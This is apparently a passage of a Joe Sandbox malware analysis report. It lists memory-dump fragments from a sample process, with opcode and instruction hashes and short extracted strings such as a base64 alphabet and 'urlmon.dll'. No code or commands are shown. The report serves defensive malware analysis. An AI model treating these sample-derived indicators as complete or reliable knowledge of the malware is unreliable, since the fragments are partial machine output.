                                                                              • Instruction ID: fafb4e02488827f90f68e08972259e518b359e44af000a808659e27be6f84b08
                                                                              • Opcode Fuzzy Hash: 3085c71337c3c83c5fc881b3bf258d66f337ed8905adb6d51428b123baf3ef37
                                                                              • Instruction Fuzzy Hash: 9EB09233F82214038B261C8D78820F4F360DAC3126E4226F7CD0EF75006462C125419A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$456789+/$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                                                              • API String ID: 0-4175356805
                                                                              • Opcode ID: 05970a128dde431c9d4fb4524cab0a5c9a1f607fd72e9a45cadf08f3a19aa525
                                                                              • Instruction ID: 1bc99b668cc3daab7e77f1f9d2212bffb79b4186ae21db1c8c4c264a57a4ee85
                                                                              • Opcode Fuzzy Hash: 05970a128dde431c9d4fb4524cab0a5c9a1f607fd72e9a45cadf08f3a19aa525
                                                                              • Instruction Fuzzy Hash: 1DA11FF19052998ECB118F59A4603DEBF71BB85204F1581E9C6AA7B243C3BE4E45DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                              • API String ID: 0-3248090998
                                                                              • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                              • Instruction ID: e6b9bedff3c958e734460c58952a883d8f9d10901ea534612e9901752a68eec9
                                                                              • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                              • Instruction Fuzzy Hash: 5F910EF08052A98ACB118F55A4603DFBF71BB95304F1581E9C6AA7B243C3BE4E85DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                              • API String ID: 0-1002149817
                                                                              • Opcode ID: 7cf9ea92bc502911c34e32b5bc4166799a6b78bf885e929bba479f5d2434354a
                                                                              • Instruction ID: 59088381be6784722ff5d623bc2493a4b9ee15b82cc4862d46808798abc90203
                                                                              • Opcode Fuzzy Hash: 7cf9ea92bc502911c34e32b5bc4166799a6b78bf885e929bba479f5d2434354a
                                                                              • Instruction Fuzzy Hash: 4CC13FB1E002689EDF21DFA4CC44BEEBBB9AF45304F00419ED54CAB241E7B54A88CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                              • API String ID: 0-3236418099
                                                                              • Opcode ID: ba8cffd5097c6cb12aa801763bc7ea45acf109531375b163dc6b5552313869e3
                                                                              • Instruction ID: 38a02fd9ebf69bd0508dd3efdf16aafc50e4d7f9e20e13f6fdabdf22ab36345d
                                                                              • Opcode Fuzzy Hash: ba8cffd5097c6cb12aa801763bc7ea45acf109531375b163dc6b5552313869e3
                                                                              • Instruction Fuzzy Hash: 5A9154B2A00218AEDB20EF948C45FEEB7BDEF45704F0441ADE508A6240EB755F85CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                              • API String ID: 0-3236418099
                                                                              • Opcode ID: c583bc45404dd6e26e559a8fa3a5af7d3c84412746d80667caff53fac11369a9
                                                                              • Instruction ID: 369a6ffbf7ed076d9fc8ed151141af1ad80680d95538d8d81a531e0e8574fcd8
                                                                              • Opcode Fuzzy Hash: c583bc45404dd6e26e559a8fa3a5af7d3c84412746d80667caff53fac11369a9
                                                                              • Instruction Fuzzy Hash: D1410CB1D00318AEDB61DFA58888BEDBBB9FF05744F10419D950CAB241E7B54B88CF54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                              • API String ID: 0-392141074
                                                                              • Opcode ID: 12fd85b064e7673a4bc69c17bd2996ec8800668aa4cb107e8a79c8b34f767370
                                                                              • Instruction ID: 41ead9d08391f53476ad84d8afc5b6277b0dbefb774e6aa92b97042989a45d76
                                                                              • Opcode Fuzzy Hash: 12fd85b064e7673a4bc69c17bd2996ec8800668aa4cb107e8a79c8b34f767370
                                                                              • Instruction Fuzzy Hash: AD7134B2E10218AADB25EB94CC45FEEB77DBF44700F04459DE608AB240EB716B44CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                              • API String ID: 0-2356907671
                                                                              • Opcode ID: 7bc6aac6338da9c78e0d10014ac5890a7f77ab9927a51d3680067eb74951fa84
                                                                              • Instruction ID: fa76e1d316ec61b97712f54a4f079b141d5a1f5ee8a77a216bd46de6f2ecd623
                                                                              • Opcode Fuzzy Hash: 7bc6aac6338da9c78e0d10014ac5890a7f77ab9927a51d3680067eb74951fa84
                                                                              • Instruction Fuzzy Hash: 318182B2E003186BDB61EBA4CC84FEF73BCEF54700F44459EA608A6241EA755B48CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                              • API String ID: 0-685823316
                                                                              • Opcode ID: 92732257817123edf1ae93fe4f7aae517e5e97c8cad474c491fa10988c59e6b4
                                                                              • Instruction ID: decdcf1b140b4b454b3946e266e8631b7d57632be51db0e7ac2efa5379e4d8ab
                                                                              • Opcode Fuzzy Hash: 92732257817123edf1ae93fe4f7aae517e5e97c8cad474c491fa10988c59e6b4
                                                                              • Instruction Fuzzy Hash: D32141B1D51218AAEF54DFE4CC49FEEBBB9AF08704F10415DE608BA180DBB51648CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                              • API String ID: 0-685823316
                                                                              • Opcode ID: 53a05371d39aec523a8e0dcd3f4d535e1c9159f04d0ed9665ee555d6113c5ae7
                                                                              • Instruction ID: 2b9f6903c3cb6dc67f78edfc8d19f64dd11d0cc99c9da4b7512618e89f23ffd6
                                                                              • Opcode Fuzzy Hash: 53a05371d39aec523a8e0dcd3f4d535e1c9159f04d0ed9665ee555d6113c5ae7
                                                                              • Instruction Fuzzy Hash: 433161B1D51218AAEF54DFE4CC49FEEBBB9AF08700F10425DE6187A180DBB51648CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %$?$B$E$G$G$X$^$_$s$|
                                                                              • API String ID: 0-438005839
                                                                              • Opcode ID: ae19d1edb79a8d5bb8874b0ae62f76c73ca680efcb4516414d00f1cf205be48d
                                                                              • Instruction ID: aa8120ba82a43b078cc5de526f57359fed4eca095c710e3f7e8688d908b2ba1f
                                                                              • Opcode Fuzzy Hash: ae19d1edb79a8d5bb8874b0ae62f76c73ca680efcb4516414d00f1cf205be48d
                                                                              • Instruction Fuzzy Hash: 1111BE10D0C7CED9DB12C6FC84086AEFF715F12225F0886D9D4E42A2D2C2794756D7A6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                              • API String ID: 0-2304485323
                                                                              • Opcode ID: 33c629241b1ba9c2321977d098507260019f07456cd27689ad0d2b25e3ade55a
                                                                              • Instruction ID: 0599000b20ca00817194f1fb18e57cc58e21fcfcfe45f85f03dff051535d83af
                                                                              • Opcode Fuzzy Hash: 33c629241b1ba9c2321977d098507260019f07456cd27689ad0d2b25e3ade55a
                                                                              • Instruction Fuzzy Hash: 3ED1D6B2A11609AFDB14EBB4CD85FEEB7F9AF48700F44491DE109A7240E778A905CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                              • API String ID: 0-2304485323
                                                                              • Opcode ID: 89343016714acb3fc9322d1e46767748934a47e3e1a3c6f6c6e6b3ba4ce0a162
                                                                              • Instruction ID: 507a5029efed68d2688073eab3e50c220346edc0b838dc10ad1c7b35b3012fbd
                                                                              • Opcode Fuzzy Hash: 89343016714acb3fc9322d1e46767748934a47e3e1a3c6f6c6e6b3ba4ce0a162
                                                                              • Instruction Fuzzy Hash: 4781D4B2A11608AFDB14DFB4CC45BEEB7F9AF58700F00491EE109AB240E775A905CB68
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: L$S$\$a$c$e$l
                                                                              • API String ID: 0-3322591375
                                                                              • Opcode ID: e062dfea7a5ee2e2859ade8c20836c4d947b0b9b81b8eac16f5d0f12620ab7ca
                                                                              • Instruction ID: 32d44087ff1d88ada995915122c4d728c79964e73ce2c30e6b5cb01a8f0e461c
                                                                              • Opcode Fuzzy Hash: e062dfea7a5ee2e2859ade8c20836c4d947b0b9b81b8eac16f5d0f12620ab7ca
                                                                              • Instruction Fuzzy Hash: 7E4193B2D14218BACF24DFA4DC88AEEB7B9FF48710F01465ED909A7210EB715945CF94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F$P$T$f$r$x
                                                                              • API String ID: 0-2523166886
                                                                              • Opcode ID: 57fd0500004c96e50845bf1db1eb4c4a491e521af7cbfd4645f97ca6fc0ac07c
                                                                              • Instruction ID: a26d4c1a1c4ad868742c9e407cdcc9e0fbb51faec765d320ce882784b09426f4
                                                                              • Opcode Fuzzy Hash: 57fd0500004c96e50845bf1db1eb4c4a491e521af7cbfd4645f97ca6fc0ac07c
                                                                              • Instruction Fuzzy Hash: AE51D771A00714ABEF38DFB5CC49BAAB3FCFF04701F00065EA50996A90E7B46945CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F$P$T$f$r$x
                                                                              • API String ID: 0-2523166886
                                                                              • Opcode ID: fc1d63c19eb2863afbc1359fe4ccb357840df6b8fd09b6087ff94655fc5aef6a
                                                                              • Instruction ID: 7978c304b5cfe4e451703eb0984c67acc204600515c700ba2c99541da73bbef0
                                                                              • Opcode Fuzzy Hash: fc1d63c19eb2863afbc1359fe4ccb357840df6b8fd09b6087ff94655fc5aef6a
                                                                              • Instruction Fuzzy Hash: 2F01D171D10308AAEF20EFE49808AAFBBB9FF45754F01815DD8047B604E7B65A09CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $TRUE$e$k$o
                                                                              • API String ID: 0-953628582
                                                                              • Opcode ID: 9834337253936e0825ba11e7f36b8a7d7b5d9d464abd247e56559c834d145994
                                                                              • Instruction ID: 7c59932186817e4e62b37c78885352c03335e71fe0965a88134f98e9714c430b
                                                                              • Opcode Fuzzy Hash: 9834337253936e0825ba11e7f36b8a7d7b5d9d464abd247e56559c834d145994
                                                                              • Instruction Fuzzy Hash: 0E81FDB5A00604ABDB25DBA4CC85FEF77BDAF88700F104959B609AB384D771AA41CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i$l$o$u
                                                                              • API String ID: 0-2051669658
                                                                              • Opcode ID: 305b42b83061644e262a9bc21fd36e64e4f6941dc812fc8ed173ec1372d9926d
                                                                              • Instruction ID: 0888958add49a3e4fd2cbf614fad3324c76758d21abac5936cd42e56d5493ef2
                                                                              • Opcode Fuzzy Hash: 305b42b83061644e262a9bc21fd36e64e4f6941dc812fc8ed173ec1372d9926d
                                                                              • Instruction Fuzzy Hash: E66102B1A00308AFDB24DBA4DC84FEFB7FDAB48710F10495DE51AA7340EA75AA45CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i$l$o$u
                                                                              • API String ID: 0-2051669658
                                                                              • Opcode ID: 75aba3f4f5d994ad6912c8146f6159ba82770f89eb70ba1079863092f46fd702
                                                                              • Instruction ID: 0cc93e9bdff76f3b180e768fa4a598ef835ad62b75ad4fd00a2f8174ed926668
                                                                              • Opcode Fuzzy Hash: 75aba3f4f5d994ad6912c8146f6159ba82770f89eb70ba1079863092f46fd702
                                                                              • Instruction Fuzzy Hash: AD410EB1A00308AFDB24DFA4CC84FEFBBFDAB48700F104959E519A7240D775AA45CB61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: 14af88ac91bb995c1e7ec2280f3372e81c7fb66e8be8b8760b9d24507e15ccec
                                                                              • Instruction ID: d81d7a2b087c100c9d374170061c87735021e699547297d54c4c640d102cdbf5
                                                                              • Opcode Fuzzy Hash: 14af88ac91bb995c1e7ec2280f3372e81c7fb66e8be8b8760b9d24507e15ccec
                                                                              • Instruction Fuzzy Hash: C9B1ECB5A00704ABDB68DBA4CC85FEFB7FDAF88700F108959F619A7340D675AA41CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$h$o
                                                                              • API String ID: 0-3662636641
                                                                              • Opcode ID: 3f48a61dcd1a14c1b6f6925c5dd8136191dd2340e76dfa45e3ccec2c7761e19c
                                                                              • Instruction ID: aeb9763c0263f5f437a543c2e214b1f30e2f897a566782f68ab6d98b47df6e09
                                                                              • Opcode Fuzzy Hash: 3f48a61dcd1a14c1b6f6925c5dd8136191dd2340e76dfa45e3ccec2c7761e19c
                                                                              • Instruction Fuzzy Hash: 527141B2B002187EDF65EB64CC89FEE737CAF49600F00469EB54996140EE745B84CFA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                              • API String ID: 0-2877786613
                                                                              • Opcode ID: 697b362677290983c1b4832d0ce993358da0d1c9adbb37d717454320f5927619
                                                                              • Instruction ID: 2f51d85aa71cb35a655e554b4a587e1b8092b471292e59e4f8e5cffde34a1084
                                                                              • Opcode Fuzzy Hash: 697b362677290983c1b4832d0ce993358da0d1c9adbb37d717454320f5927619
                                                                              • Instruction Fuzzy Hash: 92314F727112187AEB15EB98CC46FEF773EAF55A01F004549FA046B280E7746B11CBEA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                              • API String ID: 0-2877786613
                                                                              • Opcode ID: e3b1d108be587bceb2ff67a1eba2f43ba91fb6fee67d95b7a772eb97d6032a66
                                                                              • Instruction ID: 86ab1ec744c73c5ad4c1793c99aa0193ede212cbfc801951ce5da798daf6cc9c
                                                                              • Opcode Fuzzy Hash: e3b1d108be587bceb2ff67a1eba2f43ba91fb6fee67d95b7a772eb97d6032a66
                                                                              • Instruction Fuzzy Hash: 09314F727111187AEB05EB98CC45FFF773E9F55A00F004549FA046A280E7746A11CBFA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$h$o
                                                                              • API String ID: 0-3662636641
                                                                              • Opcode ID: de068fe84c84b9b1591ba04b8ea55b1303869fe39458bb24dde19bb9e20ac407
                                                                              • Instruction ID: 3e3a38100554206c078daf01378584e2974c289d5a9ac0edee00f3137670ef5a
                                                                              • Opcode Fuzzy Hash: de068fe84c84b9b1591ba04b8ea55b1303869fe39458bb24dde19bb9e20ac407
                                                                              • Instruction Fuzzy Hash: 75414F72F002187EDF64EB64CC49FEE73B8EF45700F00469EA549A6140EA746B84CFA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4$7$8$s
                                                                              • API String ID: 0-1940926696
                                                                              • Opcode ID: e5eba15769705475486d01242bb414e6361169efa3de66e08410015f2c57a7ab
                                                                              • Instruction ID: bf01f6b89d439911e1b77345e567776d26da8bc059f93a60c2832483230e079e
                                                                              • Opcode Fuzzy Hash: e5eba15769705475486d01242bb414e6361169efa3de66e08410015f2c57a7ab
                                                                              • Instruction Fuzzy Hash: 03314571E10108BBDB14DB94CD45BFE77B8EF08304F004599E908AB240EB75AE45CBE5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: d1c7c13aa29f48a967504cb70ed3bf5e6750188787e7fe3a28bc67eef35d7f42
                                                                              • Instruction ID: c0c20ebaa6933b57c07cb08c094005cd0d7639e84fe741206e9897bdda8d1c20
                                                                              • Opcode Fuzzy Hash: d1c7c13aa29f48a967504cb70ed3bf5e6750188787e7fe3a28bc67eef35d7f42
                                                                              • Instruction Fuzzy Hash: 5A312772A00614AFCF18CF98C889ADEFBB9FF59324F44825EE41A9F641D7319441CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: cdbfa5a728a78afa5aa00029dea6f08a35e4b3e142ed3b7c3c98f671ff8e16db
                                                                              • Instruction ID: 5d4a4487c1399ea87c1feba64653fddcb953708abacdf9d2b968ab8734971ada
                                                                              • Opcode Fuzzy Hash: cdbfa5a728a78afa5aa00029dea6f08a35e4b3e142ed3b7c3c98f671ff8e16db
                                                                              • Instruction Fuzzy Hash: 60019BB2A0021CABDB14DF94DC88ADEF7B9FF48314F04861DE9195B201E7719945CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: '$@]NW$AKFS$AKFS
                                                                              • API String ID: 0-3926061864
                                                                              • Opcode ID: e0cafa9d3aee40bf88746ee5037c1e136825570239cf7210840b6a92633c8186
                                                                              • Instruction ID: b450b11b3187cc67ff9be5369a92e08b53bc842f60ace2d7935356040e988320
                                                                              • Opcode Fuzzy Hash: e0cafa9d3aee40bf88746ee5037c1e136825570239cf7210840b6a92633c8186
                                                                              • Instruction Fuzzy Hash: C2E0927490428CBACB00DFE8C809AEEFF78AB00200F144A9EDD64DF342E2348615CBD6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:3.1%
